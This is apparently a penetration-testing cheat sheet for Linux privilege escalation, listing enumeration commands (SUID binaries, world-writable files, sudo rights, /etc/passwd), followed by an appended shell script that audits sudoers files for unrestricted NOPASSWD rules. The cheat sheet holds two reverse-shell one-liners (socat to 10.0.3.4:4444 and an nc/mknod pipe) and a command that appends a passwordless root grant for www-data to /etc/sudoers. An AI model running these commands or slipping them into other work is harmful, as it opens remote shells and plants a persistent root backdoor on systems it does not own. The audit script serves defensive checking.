- Find World Writable Folders
```ShellSession
find / -xdev -type d -perm -0002 -ls 2> /dev/null
```
- Find World Writable Files
```ShellSession
find / -xdev -type f -perm -0002 -ls 2> /dev/null
```
- Find SUIDs
```ShellSession
find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
```
- Distro Information
```ShellSession
cat /etc/*-release
```
- Check open ports
```ShellSession
netstat -antup
```
- Check for sudo permissions
```ShellSession
sudo -l
```
- Check OS architecture
```ShellSession
uname -a
```
- Check cronjobs
```ShellSession
cat /etc/cron*
```
- Check network configuration
```ShellSession
ip addr
```
- Check contents of /etc/passwd
```ShellSession
cat /etc/passwd
```
- Using socat
- Listen
```ShellSession
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```
- Connect
```ShellSession
$ socat file:`tty`,raw,echo=0 tcp-listen:4444
```
- Reverse connection using mknod
```ShellSession
mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc <ip> <port> 1> /tmp/backpipe; rm /tmp/backpipe
```
- Check version of an installed application
```ShellSession
dpkg -l <application name>
```
- Sometimes checking `/opt`, `/tmp`, `/var`, `/usr` might help.
- Edit sudoers file and grant sudo access to the current user (www-data in this case) with no password
```ShellSession
echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers
```
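
A defender-side check for the sudoers change in the last item, as an added example that is not part of the original page: the function below reports every rule in which `NOPASSWD` covers the command `ALL`, following the sudoers rule that a tag carries over to later commands until overridden. The name `audit_sudoers` and the sample rules are constructed for illustration; the parser assumes one rule per line, a single host list per rule, and does not follow include directives.

```shell
#!/bin/sh
# Added example (not from the original page). Assumes one rule per line
# (no backslash continuations) and a single Host_List per rule.

# audit_sudoers FILE: print "user<TAB>rule" for each rule in which the
# command ALL is covered by NOPASSWD; exit status 1 if any rule matched.
audit_sudoers() {
    awk '
    /^[ \t]*#/        { next }               # comments and #include lines
    /^[ \t]*Defaults/ { next }               # settings, not grants
    {
        spec = $0
        if (!sub(/^[^=]*=/, "", spec)) next  # no "=": not a user spec
        gsub(/\([^)]*\)/, "", spec)          # drop Runas lists such as (ALL:ALL)
        n = split(spec, cmd, ",")
        np = 0                               # tags carry over to later commands
        for (i = 1; i <= n; i++) {
            c = cmd[i]
            gsub(/^[ \t]+|[ \t]+$/, "", c)
            while (match(c, /^[A-Z_]+[ \t]*:[ \t]*/)) {
                tag = substr(c, 1, RLENGTH)
                sub(/[ \t]*:.*/, "", tag)
                if (tag == "NOPASSWD") np = 1
                if (tag == "PASSWD")   np = 0
                c = substr(c, RLENGTH + 1)
            }
            if (c == "ALL" && np) { printf "%s\t%s\n", $1, $0; hits++; break }
        }
    }
    END { exit (hits > 0) }
    ' "$1"
}

# Constructed sample sudoers content, not taken from a real host.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# www-data ALL=NOPASSWD: ALL   (commented out, must be ignored)
Defaults env_reset
root     ALL=(ALL:ALL) ALL
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
backup   ALL=(ALL) NOPASSWD: /bin/tar, PASSWD: ALL
ops      ALL=(ALL) NOPASSWD: SETENV: ALL
www-data ALL=NOPASSWD: ALL
EOF
audit_sudoers "$sample" || echo "unrestricted NOPASSWD rules present" >&2
rm -f "$sample"
```

Run it against `/etc/sudoers` and each file under `/etc/sudoers.d/` separately, since included files are not followed.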